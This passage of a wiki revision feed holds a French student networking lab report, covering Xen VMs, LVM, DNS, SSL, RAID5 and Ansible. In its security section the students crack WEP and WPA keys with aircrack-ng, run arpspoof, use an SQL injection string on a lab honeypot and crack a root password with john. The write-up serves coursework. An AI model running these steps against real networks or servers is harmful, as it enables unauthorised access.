 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55161</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55161"/>
				<updated>2020-12-22T00:29:47Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration du serveur de mail pour la vérification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le répertoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55160</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55160"/>
				<updated>2020-12-22T00:29:16Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration du serveur de mail pour la vérification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
